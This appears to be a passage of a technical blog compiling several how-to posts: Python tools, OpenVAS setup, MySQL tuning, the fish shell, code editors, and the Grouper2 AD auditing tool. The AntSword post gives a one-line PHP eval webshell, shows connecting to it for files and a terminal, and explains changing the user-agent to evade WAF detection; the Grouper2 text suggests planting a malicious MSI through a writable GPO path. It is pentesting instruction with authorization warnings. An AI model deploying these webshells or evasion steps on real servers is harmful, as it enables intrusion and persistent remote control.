file-max is the maximum File Descriptors (FD) enforced on a kernel level, which cannot be surpassed by all processes without increasing. The ulimit is enforced on a process level, which can be less than the file-max. [4]

Resources

[1] “ocserv 1.0.0”, Openconnect VPN Server. [Online]. Available: https://ocserv.gitlab.io/www/manual.html

[2] “OpenConnect VPN client.”, Infradead.org, 2020. [Online]. Available: https://www.infradead.org/openconnect

[3] “openconnect/openconnect-gui”, GitHub, 2020. [Online]. Available: https://github.com/openconnect/openconnect-gui/releases

[4] “How do ulimit -n and /proc/sys/fs/file-max differ?”, Server Fault, 2020. [Online]. Available: https://serverfault.com/questions/122679/how-do-ulimit-n-and-proc-sys-fs-file-max-differ.


Useful tools for Python

Python Tutor

Free online Python code visualization, Python learning tool.

Python Tutor
Python Tutor

http://pythontutor.com/

Anaconda

Easy package management

Packed with many useful Python tools

Anaconda
Anaconda
Anaconda - Software
Anaconda – Software

https://www.anaconda.com/distribution/#download-section

Jupyter Notebook

Jupyter notebook is like a magic notebook for Python. It can be used to share Notes, algebra, data analytics, code etc easily.

Jupyter Notebook
Jupyter Notebook

https://jupyter.org/install

(We can use Anaconda to install it easily)

IPython

IPython is a interactive shell for Python.

Supports Automatic indenting, bash shell commands, many built-in functions etc.

https://ipython.org/

Skulpt

Skulpt is a online Python environment built via javascript. Use with CodeMirror, we can do basic Python programming.

Skulpt
Skulpt

http://skulpt.org/


How to: Start/Use/Initialize OpenVAS – Open Vulnerability Assessment Scanner on Kali Linux (Intro)

Before using the OpenVAS, we need to setup and update it.

1 Launch a terminal, and run setup for OpenVAS

sudo openvas-setup

Wait until it finishes downloading and updating, it will take awhile

2 When it’s done, it will show the admin login username and admin login password, note them down, we will need them every time we try to login to OpenVAS

openvas-setup done
openvas-setup done

*3 Update feed for OpenVAS (Only required if there is new updates), when initializing, this step was done once already.

sudo openvas-feed-update

If failed (You might encounter this error)

rsync: failed to connect to feed.openvas.org (xx.xx.xx.xx): Connection refused (111)
rsync: failed to connect to feed.openvas.org (xx:xx:xx:xx::xx): Connection timed out (110)
rsync error: error in socket IO (code 10) at clientserver.c(127) [Receiver=3.1.3]

Just try again with the same command, it should get through.

4 Launch OpenVAS

sudo openvas-start

It will tell us the address for webui, in this case, it is https://127.0.0.1:9392

OpenVAS webui
OpenVAS webui

(We might encounter following error)

Failed to execute default Web Browser
Failed to execute default Web Browser

It’s OK, just close it, then launch our favourite web browser then enter https://127.0.0.1:9392 as the address

Now we should have the OpenVAS login screen in front of us.

OpenVAS login screen
OpenVAS login screen

5 Enter your login detail recorded from step 2

Now you will see the Dashboard of OpenVAS.

Happy hunting/fixing 🙂


AntSword – a Security Tool for Post Exploitation

AntSword
AntSword

AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader
AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.

AntSword
AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.


How to: Optimize MySQL, MariaDB with Simple Tools

1 mysqltuner.pl

mysqltuner.pl
mysqltuner.pl

Supports MySQL, MariaDB, Percona Server etc. with over 300

Tuning MySQL performance, checks configuration, including log file settings, storage engine, security. Outline potential issues/fix.

1.1 Download

cd /tmp
 
wget https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl
 
chmod +x mysqltuner.pl

1.2 Usage

 ./mysqltuner.pl --socket /var/lib/mysql/mysql.sock 

1.3 Output

Items with [!!] are important e.g. Maximum possible memory usage: 10G (300% of installed RAM)

Last section with “Recommendations” tells us where we can look into, which Variables we should adjust and suggested values etc.

mysqltuner.pl: https://github.com/major/MySQLTuner-perl

2 tuning-primer.sh

Similar to mysqltuner.pl.

Currently it handles recomendations for the following:

  • Slow Query Log
  • Max Connections
  • Worker Threads
  • Key Buffer [MyISAM only]
  • Query Cache
  • Sort Buffer
  • Joins
  • Temp Tables
  • Table (Open & Definition) Cache
  • Table Locking
  • Table Scans (read_buffer) [MyISAM only]
  • InnoDB Status

2.1 Download

cd /tmp
 
wget https://launchpad.net/mysql-tuning-primer/trunk/1.6-r1/+download/tuning-primer.sh
 
chmod +x tuning-primer.sh

2.2 Usage

./tuning-primer.sh

tuning-primer.sh: https://github.com/BMDan/tuning-primer.sh

3 pt-variable-advisor

Analyses MySQL variables, output suggestions based on those variables.

3.1 Download

https://www.percona.com/downloads/percona-toolkit/LATEST/

3.2 Usage

pt-variable-advisor localhost --socket /var/lib/mysql/mysql.sock

4 pt-qurey-digest

Analyses log, process list, tcpdump for MySQL queries. Mainly used to analyze slow queries. pt-qurey-digest outputs more details compare to py-query_digest.

4.1 Download

Sames as “3 pt-variable-advisor”

4.2 Usage

pt-query-digest /var/lib/mysql/slowtest-slow.log

4.3 Other usages

# Analyze slow quires
pt-query-digest /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within 24 hours
pt-query-digest --since=24h /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within specified time frame
pt-query-digest /var/lib/mysql/slowtest-slow.log --since '2020-01-01 00:00:00' --until '2012-01-10 00:00:00'> > slow_report.log
 
# Slow quires with select
pt-query-digest --filter '$event->{fingerprint} =~ m/^select/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# Query from specific user
pt-query-digest --filter '($event->{user} || "") =~ m/^root/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# All full table scanning, full join slow quires
pt-query-digest --filter '(($event->{Full_scan} || "") eq "yes") ||(($event->{Full_join} || "") eq "yes")' /var/lib/mysql/slowtest-slow.log> slow_report.log

How to: Quickly and Easily search a folder, partition or even computer for files in Microsoft Windows

When using Windows built-in search function, it can take ages to search a partition, it will take even longer if you want to search files across all partitions.

Everything is a free filename search software for Windows that can bring up your search results in seconds.

Everything
Everything
  • Small installation file
  • Clean and simple user interface
  • Quick file indexing
  • Quick searching
  • Quick startup
  • Minimal resource usage
  • Small database on disk
  • Real-time updating
  • Multilingual support
  • Has official portable version

Download Everything 1.4.1.935

Installer

64-bit Installer

Portable zip

64-bit Portable zip

Supported Languages

Language pack for Everything

Resource

Official website


Powerful Linux Interactive shell

fish (friendly interactive shell) is a smart and user-friendly command line shell for Linux, macOS, and the rest of the family.

Autosuggestions

Autosuggestion Thumbnail

fish suggests commands as you type based on history and completions, just like a web browser. Watch out, Netscape Navigator 4.0!

Glorious VGA Color

Colors Thumbnail

fish supports 24 bit true color, the state of the art in terminal technology. Behold the monospaced rainbow.

Sane Scripting

Scripting Thumbnail

fish is fully scriptable, and its syntax is simple, clean, and consistent. You’ll never write esac again.

Web Based configuration

Web Config Thumbnail

For those lucky few with a graphical computer, you can set your colors and view functions, variables, and history all from a web page.

Man Page Completions

Man Page Completions Thumbnail

Other shells support programmable completions, but only fish generates them automatically by parsing your installed man pages.

Works Out Of The Box

Works Out of the Box Thumbnail

fish will delight you with features like tab completions and syntax highlighting that just work, with nothing new to learn or configure.

fish can be installed easily on most Linux distros with their default package manager.

Linux

# Debian/Ubuntu/Kali Linux etc.
sudo apt install fish
 
# RHEL/CentOS/Fedora
sudo dns install fish
or, for older version
sudo yum install fish
 
# Archlinux
pacman -S fish
 
# gentoo Linux
emerge fish
 
# void-Linux
xbps-install fish-shell
 
# NixOS
nix-env -i fish
 
# Guix
guix package -i fish
 
# Solus
eopkg install fish
 
# Hombrew
brew install fish

BSD

# FreeBSD
pkg install fish
 
# OpenBSD
pkg_add fish

Windows

# Cygwin
fish is available in setup, in the Shells category.
 
# Windows Subsystem for Linux
sudo apt install fish
or
depend on the Linux distro you've chose, refer to the above "Linux" part to find correct command to use
 
# MSYS2
pacman -S fish

masOS

# Homebrew
brew install fish
 
# MacPorts
sudo port install fish
 
# Installer
https://github.com/fish-shell/fish-shell/releases/download/3.1.0/fish-3.1.0.pkg
 
10.6+: Installs to /usr/local/

Bonus

  • To use, type fish in the terminal then hit Enter key

To check fish version

echo $FISH_VERSION

HTML version help document

help

To switch default shell to fish

sudo chsh -s /usr/bin/fish

To switch back to default bash shell

sudo chsh -s /bin/bash

(If your default shell is zsh)

sudo chsh -s /usr/zsh

Simple/Quick List of Free Code Editors (Include free, open source)

(There are many commercial editors with trial period, they are not included in this list, only free or open source editors are listed)

  1. Aptana Studio (Windows, Linux, macOS)
  2. Atom.io (Windows, Linux, macOS)
  3. Crimson Editor (Windows)
  4. jEdit (Windows, Linux, macOS)
  5. Notepad++ (Windows)
  6. Programmer’s Notepad (Windows)
  7. PSPad (Windows)
  8. SCREEM (Linux) (HTML/Web)
  9. Visual Studio Code (Windows, Linux, macOS)

Open source/Free tools to find vulnerability in Active Directory (AD) – Grouper2

Grouper2 vs Grouper

Grouper

1 The computer must be joined to the domain with GPMC and RSAT installed

2 User must use Get-GPOReport with PowerShell to generate XML report

3 The report is required by Grouper

4 Users must manually filter out useful data

Grouper2

Grouper2 does not rely on Get-GPOReport, it still needs to parse different types of files format.

1 More accurate file permission detection, no read/write of storage required

2 Won’t ignore GPP password

3 Provide HTML format output

4 Multi-thread support

5 Supports offline mode

Official description

What is it for?

Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft’s Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?

It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?

Where Grouper required you to:

  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there’s some good stuff in there.

Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.

This means you don’t have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).

Other cool new features:

  • better file permission checks that don’t involve writing to disk.
  • doesn’t miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it’s multithreaded!
  • a bunch of other great stuff but it’s late and I’m tired.

Also, it’s written in C# instead of PowerShell.

How do I use it?

Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.

If the JSON burns your eyes, add -g to make it real pretty.

If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.

If there’s too much candy and you want to limit output to only the tastiest morsels, set the ‘interest level’ with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.

If you don’t want to dig around in old policy and want to limit yourself to only current stuff, do -c.

If you want the candy to fall out faster, you can set the number of threads with -t $INT – the default is 10.

If you want to see the other options, do -h.

I don’t get it.

OK have a look at this:

A picture of some Grouper2 output

In the screenshot above we can see an “Assigned Application” policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it’s being installed from is writable by the current user.

If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!

A picture of some Grouper2 output

In this one you can see that someone’s done something absolutely insane to the ACLS on the registry.

You get the picture.

Resource

Official Github page